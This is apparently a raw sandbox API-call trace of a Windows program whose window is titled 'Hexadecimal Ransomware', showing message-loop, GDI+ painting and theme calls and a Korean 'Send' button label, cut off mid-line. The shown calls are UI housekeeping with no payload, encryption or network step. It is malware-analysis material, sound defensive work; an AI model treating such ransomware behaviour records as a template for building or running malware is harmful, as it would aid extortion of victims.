CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1c, wParam=0x0, lParam=0xf70) returned 0x0 [0244.863] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0244.863] GetCapture () returned 0x0 [0244.863] InvalidateRect (hWnd=0x102d8, lpRect=0x0, bErase=0) returned 1 [0244.864] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0244.867] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0244.867] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0 [0244.868] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0244.868] IsWindowUnicode (hWnd=0x202e6) returned 1 [0244.869] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0244.869] TranslateMessage (lpMsg=0x11fed00) returned 0 [0244.869] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0244.869] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0244.870] IsWindowUnicode (hWnd=0x102d8) returned 1 [0244.870] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0244.870] TranslateMessage (lpMsg=0x11fed00) returned 0 [0244.870] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0244.870] BeginPaint (in: hWnd=0x102d8, lpPaint=0x11fe748 | out: lpPaint=0x11fe748) returned 0x10105d6 [0244.871] SelectPalette (hdc=0x10105d6, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0244.871] CreateCompatibleDC (hdc=0x10105d6) returned 0x2e010830 [0244.871] SelectObject (hdc=0x2e010830, h=0xb050815) returned 0x85000f [0244.871] GdipCreateFromHDC (hdc=0x2e010830, graphics=0x11fe760) returned 0x0 [0244.872] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0244.872] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=64, height=25, combineMode=0x0) returned 0x0 [0244.878] GdipCreateMatrix (matrix=0x11fe7a8) returned 0x0 [0244.878] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0244.878] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe7c0) returned 0x0 [0244.878] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0244.879] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593ae8) returned 0x0 [0244.879] LocalFree (hMem=0x1593ae8) returned 0x0 [0244.879] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0244.879] GdipCreateRegion (region=0x11fe7a8) returned 0x0 [0244.879] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0244.879] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7b4) returned 0x0 [0244.879] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe7e0) returned 0x0 [0244.879] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd850dbd) returned 0x0 [0244.879] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0244.880] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5cc) returned 0x0 [0244.880] GetCurrentObject (hdc=0x2e010830, type=0x1) returned 0xb00017 [0244.880] GetCurrentObject (hdc=0x2e010830, type=0x2) returned 0x900010 [0244.880] GetCurrentObject (hdc=0x2e010830, type=0x7) returned 0xb050815 [0244.880] GetCurrentObject (hdc=0x2e010830, type=0x6) returned 0x8a01c2 [0244.880] SaveDC (hdc=0x2e010830) returned 1 [0244.881] GetNearestColor (hdc=0x2e010830, color=0x0) returned 0x0 [0244.881] GetNearestColor (hdc=0x2e010830, color=0x0) returned 0x0 [0244.881] GetNearestColor (hdc=0x2e010830, color=0x0) returned 0x0 [0244.881] GetNearestColor (hdc=0x2e010830, color=0x989898) returned 0x989898 [0244.881] GetNearestColor (hdc=0x2e010830, color=0x0) returned 0x0 [0244.881] GetNearestColor (hdc=0x2e010830, color=0x7f7f7f) returned 0x7f7f7f [0244.881] GetNearestColor (hdc=0x2e010830, color=0x989898) returned 0x989898 [0244.881] GetNearestColor (hdc=0x2e010830, color=0x0) returned 0x0 [0244.881] GetNearestColor (hdc=0x2e010830, color=0x0) returned 0x0 [0244.881] RestoreDC (hdc=0x2e010830, nSavedDC=-1) returned 1 [0244.882] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2e010830) returned 0x0 [0244.882] IsAppThemed () returned 0x1 [0244.882] GetThemeAppProperties () returned 0x3 [0244.882] GetThemeAppProperties () returned 0x3 [0244.883] IsAppThemed () returned 0x1 [0244.883] GetThemeAppProperties () returned 0x3 [0244.883] GetThemeAppProperties () returned 0x3 [0244.883] DrawTextExW (in: hdc=0x450107b6, lpchText="전송하기", cchText=4, lprc=0x11fe488, format=0x2415, lpdtp=0x3355b90 | out: lpchText="전송하기", lprc=0x11fe488) returned 13 [0244.892] IsAppThemed () returned 0x1 [0244.892] GetThemeAppProperties () returned 0x3 [0244.892] GetThemeAppProperties () returned 0x3 [0244.892] IsAppThemed () returned 0x1 [0244.892] GetThemeAppProperties () returned 0x3 [0244.892] GetThemeAppProperties () returned 0x3 [0244.892] GetFocus () returned 0x0 [0244.892] IsAppThemed () returned 0x1 [0244.892] GetThemeAppProperties () returned 0x3 [0244.892] GetThemeAppProperties () returned 0x3 [0244.892] IsAppThemed () returned 0x1 [0244.893] GetThemeAppProperties () returned 0x3 [0244.893] GetThemeAppProperties () returned 0x3 [0244.893] IsThemePartDefined () returned 0x1 [0244.893] IsAppThemed () returned 0x1 [0244.893] GetThemeAppProperties () returned 0x3 [0244.893] GetThemeAppProperties () returned 0x3 [0244.893] IsThemeBackgroundPartiallyTransparent () returned 0x1 [0244.893] IsAppThemed () returned 0x1 [0244.893] GetThemeAppProperties () returned 0x3 [0244.893] GetThemeAppProperties () returned 0x3 [0244.893] IsAppThemed () returned 0x1 [0244.893] GetThemeAppProperties () returned 0x3 [0244.893] GetThemeAppProperties () returned 0x3 [0244.893] IsThemePartDefined () returned 0x1 [0244.894] GdipCreateRegion (region=0x11fe4d0) returned 0x0 [0244.894] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0244.894] GdipCreateMatrix (matrix=0x11fe4d0) returned 0x0 [0244.894] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0244.894] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe4e8) returned 0x0 [0244.894] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0244.894] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ae8) returned 0x0 [0244.894] LocalFree (hMem=0x1593ae8) returned 0x0 [0244.894] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0244.894] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ae8) returned 0x0 [0244.894] LocalFree (hMem=0x1593ae8) returned 0x0 [0244.894] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0244.894] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe510) returned 0x0 [0244.894] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe500) returned 0x0 [0244.894] GdipGetRegionHRgn (region=0x6e1a090, graphics=0x6e19d80, hRgn=0x11fe500) returned 0x0 [0244.895] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0244.895] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe518) returned 0x0 [0244.895] GetCurrentObject (hdc=0x2e010830, type=0x1) returned 0xb00017 [0244.895] GetCurrentObject (hdc=0x2e010830, type=0x2) returned 0x900010 [0244.895] GetCurrentObject (hdc=0x2e010830, type=0x7) returned 0xb050815 [0244.895] GetCurrentObject (hdc=0x2e010830, type=0x6) returned 0x8a01c2 [0244.895] SaveDC (hdc=0x2e010830) returned 1 [0244.895] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x46040825 [0244.895] GetClipRgn (hdc=0x2e010830, hrgn=0x46040825) returned 0 [0244.895] SelectClipRgn (hdc=0x2e010830, hrgn=0x3604081c) returned 2 [0244.895] DeleteObject (ho=0x46040825) returned 1 [0244.895] DeleteObject (ho=0x3604081c) returned 1 [0244.895] OffsetViewportOrgEx (in: hdc=0x2e010830, x=0, y=0, lppt=0x3356240 | out: lppt=0x3356240) returned 1 [0244.896] DrawThemeParentBackground () returned 0x0 [0244.896] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe1dc | out: lpwndpl=0x11fe1dc) returned 1 [0244.896] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe188 | out: lpRect=0x11fe188) returned 1 [0244.896] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0244.896] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0244.896] GetSystemMetrics (nIndex=42) returned 0 [0244.897] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe030, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0244.897] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe030) returned 0x16 [0244.897] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe090 | out: lpRect=0x11fe090) returned 1 [0244.897] GetCurrentObject (hdc=0x2e010830, type=0x1) returned 0xb00017 [0244.897] GetCurrentObject (hdc=0x2e010830, type=0x2) returned 0x900010 [0244.897] GetCurrentObject (hdc=0x2e010830, type=0x7) returned 0xb050815 [0244.897] GetCurrentObject (hdc=0x2e010830, type=0x6) returned 0x8a01c2 [0244.897] SaveDC (hdc=0x2e010830) returned 2 [0244.897] GetNearestColor (hdc=0x2e010830, color=0x0) returned 0x0 [0244.897] CreateSolidBrush (color=0x0) returned 0x2b100826 [0244.897] FillRect (hDC=0x2e010830, lprc=0x11fdf30, hbr=0x2b100826) returned 1 [0244.898] DeleteObject (ho=0x2b100826) returned 1 [0244.898] RestoreDC (hdc=0x2e010830, nSavedDC=-1) returned 1 [0244.898] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0244.898] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0244.898] GetSystemMetrics (nIndex=42) returned 0 [0244.898] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0244.898] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0244.898] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe030 | out: lpRect=0x11fe030) returned 1 [0244.898] GetCurrentObject (hdc=0x2e010830, type=0x1) returned 0xb00017 [0244.898] GetCurrentObject (hdc=0x2e010830, type=0x2) returned 0x900010 [0244.898] GetCurrentObject (hdc=0x2e010830, type=0x7) returned 0xb050815 [0244.898] GetCurrentObject (hdc=0x2e010830, type=0x6) returned 0x8a01c2 [0244.898] SaveDC (hdc=0x2e010830) returned 2 [0244.898] GetNearestColor (hdc=0x2e010830, color=0x0) returned 0x0 [0244.898] CreateSolidBrush (color=0x0) returned 0x2c100826 [0244.898] FillRect (hDC=0x2e010830, lprc=0x11fded0, hbr=0x2c100826) returned 1 [0244.898] DeleteObject (ho=0x2c100826) returned 1 [0244.898] RestoreDC (hdc=0x2e010830, nSavedDC=-1) returned 1 [0244.899] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0244.899] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0244.899] GetSystemMetrics (nIndex=42) returned 0 [0244.899] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0244.899] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0244.899] RestoreDC (hdc=0x2e010830, nSavedDC=-1) returned 1 [0244.899] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2e010830) returned 0x0 [0244.899] IsAppThemed () returned 0x1 [0244.899] GetThemeAppProperties () returned 0x3 [0244.899] GetThemeAppProperties () returned 0x3 [0244.899] IsAppThemed () returned 0x1 [0244.899] GetThemeAppProperties () returned 0x3 [0244.899] GetThemeAppProperties () returned 0x3 [0244.899] IsThemePartDefined () returned 0x1 [0244.900] GdipCreateRegion (region=0x11fe454) returned 0x0 [0244.900] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0244.900] GdipCreateMatrix (matrix=0x11fe454) returned 0x0 [0244.900] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a0f0) returned 0x0 [0244.900] GdipIsMatrixIdentity (matrix=0x6e1a0f0, result=0x11fe46c) returned 0x0 [0244.900] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0244.900] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593ea0) returned 0x0 [0244.900] LocalFree (hMem=0x1593ea0) returned 0x0 [0244.900] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0244.900] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593ea0) returned 0x0 [0244.900] LocalFree (hMem=0x1593ea0) returned 0x0 [0244.900] GdipDeleteMatrix (matrix=0x6e1a0f0) returned 0x0 [0244.900] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe494) returned 0x0 [0244.900] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe484) returned 0x0 [0244.900] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe484) returned 0x0 [0244.900] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0244.900] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe49c) returned 0x0 [0244.900] GetCurrentObject (hdc=0x2e010830, type=0x1) returned 0xb00017 [0244.900] GetCurrentObject (hdc=0x2e010830, type=0x2) returned 0x900010 [0244.900] GetCurrentObject (hdc=0x2e010830, type=0x7) returned 0xb050815 [0244.900] GetCurrentObject (hdc=0x2e010830, type=0x6) returned 0x8a01c2 [0244.901] SaveDC (hdc=0x2e010830) returned 1 [0244.901] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3704081c [0244.901] GetClipRgn (hdc=0x2e010830, hrgn=0x3704081c) returned 0 [0244.901] SelectClipRgn (hdc=0x2e010830, hrgn=0x48040825) returned 2 [0244.901] DeleteObject (ho=0x3704081c) returned 1 [0244.901] DeleteObject (ho=0x48040825) returned 1 [0244.901] OffsetViewportOrgEx (in: hdc=0x2e010830, x=0, y=0, lppt=0x3356c00 | out: lppt=0x3356c00) returned 1 [0244.901] IsAppThemed () returned 0x1 [0244.923] GetThemeAppProperties () returned 0x3 [0244.923] GetThemeAppProperties () returned 0x3 [0244.923] DrawThemeBackground () returned 0x0 [0244.924] RestoreDC (hdc=0x2e010830, nSavedDC=-1) returned 1 [0244.924] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2e010830) returned 0x0 [0244.924] GdipCreateRegion (region=0x11fe458) returned 0x0 [0244.924] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0244.924] GdipCreateMatrix (matrix=0x11fe458) returned 0x0 [0244.924] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0244.924] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe470) returned 0x0 [0244.924] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593f10 [0244.924] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593f10) returned 0x0 [0244.924] LocalFree (hMem=0x1593f10) returned 0x0 [0244.924] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0244.925] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ae8) returned 0x0 [0244.925] LocalFree (hMem=0x1593ae8) returned 0x0 [0244.925] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0244.925] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe498) returned 0x0 [0244.925] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe488) returned 0x0 [0244.925] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe488) returned 0x0 [0244.925] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0244.925] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe4a0) returned 0x0 [0244.925] GetCurrentObject (hdc=0x2e010830, type=0x1) returned 0xb00017 [0244.925] GetCurrentObject (hdc=0x2e010830, type=0x2) returned 0x900010 [0244.925] GetCurrentObject (hdc=0x2e010830, type=0x7) returned 0xb050815 [0244.925] GetCurrentObject (hdc=0x2e010830, type=0x6) returned 0x8a01c2 [0244.925] SaveDC (hdc=0x2e010830) returned 1 [0244.925] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x49040825 [0244.925] GetClipRgn (hdc=0x2e010830, hrgn=0x49040825) returned 0 [0244.925] SelectClipRgn (hdc=0x2e010830, hrgn=0x3804081c) returned 2 [0244.925] DeleteObject (ho=0x49040825) returned 1 [0244.926] DeleteObject (ho=0x3804081c) returned 1 [0244.926] OffsetViewportOrgEx (in: hdc=0x2e010830, x=0, y=0, lppt=0x3356ed4 | out: lppt=0x3356ed4) returned 1 [0244.926] IsAppThemed () returned 0x1 [0244.926] GetThemeAppProperties () returned 0x3 [0244.926] GetThemeAppProperties () returned 0x3 [0244.926] GetThemeBackgroundContentRect () returned 0x0 [0244.926] RestoreDC (hdc=0x2e010830, nSavedDC=-1) returned 1 [0244.926] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2e010830) returned 0x0 [0244.926] IsAppThemed () returned 0x1 [0244.926] GetThemeAppProperties () returned 0x3 [0244.926] GetThemeAppProperties () returned 0x3 [0244.926] GdipGetTextRenderingHint (graphics=0x6e19d80, mode=0x11fe5d4) returned 0x0 [0244.926] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5c0) returned 0x0 [0244.926] GetCurrentObject (hdc=0x2e010830, type=0x1) returned 0xb00017 [0244.926] GetCurrentObject (hdc=0x2e010830, type=0x2) returned 0x900010 [0244.926] GetCurrentObject (hdc=0x2e010830, type=0x7) returned 0xb050815 [0244.926] GetCurrentObject (hdc=0x2e010830, type=0x6) returned 0x8a01c2 [0244.926] SaveDC (hdc=0x2e010830) returned 1 [0244.927] GetTextAlign (hdc=0x2e010830) returned 0x0 [0244.927] GetTextColor (hdc=0x2e010830) returned 0x0 [0244.927] GetCurrentObject (hdc=0x2e010830, type=0x6) returned 0x8a01c2 [0244.927] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe308 | out: pv=0x11fe308) returned 92 [0244.927] SelectObject (hdc=0x2e010830, h=0x170a07ff) returned 0x8a01c2 [0244.927] GetBkMode (hdc=0x2e010830) returned 2 [0244.927] SetBkMode (hdc=0x2e010830, mode=1) returned 2 [0244.927] DrawTextExW (in: hdc=0x2e010830, lpchText="전송하기", cchText=4, lprc=0x11fe3f0, format=0x2415, lpdtp=0x3357274 | out: lpchText="전송하기", lprc=0x11fe3f0) returned 13 [0244.931] DrawTextExW (in: hdc=0x2e010830, lpchText="전송하기", cchText=4, lprc=0x11fe554, format=0x2015, lpdtp=0x3357274 | out: lpchText="전송하기", lprc=0x11fe554) returned 13 [0244.932] RestoreDC (hdc=0x2e010830, nSavedDC=-1) returned 1 [0244.932] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2e010830) returned 0x0 [0244.932] GetFocus () returned 0x0 [0244.933] IsAppThemed () returned 0x1 [0244.933] GetThemeAppProperties () returned 0x3 [0244.933] GetThemeAppProperties () returned 0x3 [0244.933] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7a0) returned 0x0 [0244.933] BitBlt (hdc=0x10105d6, x=0, y=0, cx=64, cy=25, hdcSrc=0x2e010830, x1=0, y1=0, rop=0xcc0020) returned 1 [0244.933] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2e010830) returned 0x0 [0244.933] SelectPalette (hdc=0x10105d6, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0244.933] SelectObject (hdc=0x2e010830, h=0x85000f) returned 0xb050815 [0244.933] DeleteDC (hdc=0x2e010830) returned 1 [0244.933] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0244.933] EndPaint (hWnd=0x102d8, lpPaint=0x11fe744) returned 1 [0244.934] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0244.934] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0244.934] WaitMessage () returned 1 [0244.934] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0244.934] IsWindowUnicode (hWnd=0x202e6) returned 1 [0244.934] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0244.934] TranslateMessage (lpMsg=0x11fed00) returned 0 [0244.934] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0244.935] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0244.935] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0244.935] WaitMessage () returned 1 [0244.990] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0244.990] GetMessageA (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0244.990] TranslateMessage (lpMsg=0x11fed00) returned 0 [0244.990] DispatchMessageA (lpMsg=0x11fed00) returned 0x0 [0244.990] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0244.990] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0244.990] WaitMessage () returned 1 [0245.052] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0245.052] IsWindowUnicode (hWnd=0x202e6) returned 1 [0245.052] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0245.052] TranslateMessage (lpMsg=0x11fed00) returned 0 [0245.052] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0245.055] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0245.055] IsWindowUnicode (hWnd=0x202e6) returned 1 [0245.055] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0245.055] TranslateMessage (lpMsg=0x11fed00) returned 0 [0245.055] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0245.056] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0245.056] IsWindowUnicode (hWnd=0x202e6) returned 1 [0245.056] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0245.056] TranslateMessage (lpMsg=0x11fed00) returned 0 [0245.056] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0245.057] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0245.057] IsWindowUnicode (hWnd=0x202e6) returned 1 [0245.057] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0245.057] TranslateMessage (lpMsg=0x11fed00) returned 0 [0245.057] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0245.057] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0245.058] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0245.058] WaitMessage () returned 1 [0245.195] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0245.195] IsWindowUnicode (hWnd=0x102ea) returned 1 [0245.195] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0245.195] TranslateMessage (lpMsg=0x11fed00) returned 0 [0245.195] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0245.196] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0245.196] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0245.196] WaitMessage () returned 1 [0265.168] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.170] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x46, wParam=0x0, lParam=0x11febd4) returned 0x0 [0265.172] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe900 | out: lpwndpl=0x11fe900) returned 1 [0265.172] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x47, wParam=0x0, lParam=0x11febd4) returned 0x0 [0265.172] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0265.172] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0265.173] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1c, wParam=0x1, lParam=0xca4) returned 0x0 [0265.173] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x1c, wParam=0x1, lParam=0xca4) returned 0x0 [0265.173] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0265.185] GetFocus () returned 0x0 [0265.185] SetFocus (hWnd=0x102d8) returned 0x0 [0265.188] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0265.189] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0265.189] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0265.190] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0265.190] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0265.191] GetStockObject (i=5) returned 0x900015 [0265.191] CallWindowProcW (lpPrevWndFunc=0x7412e800, 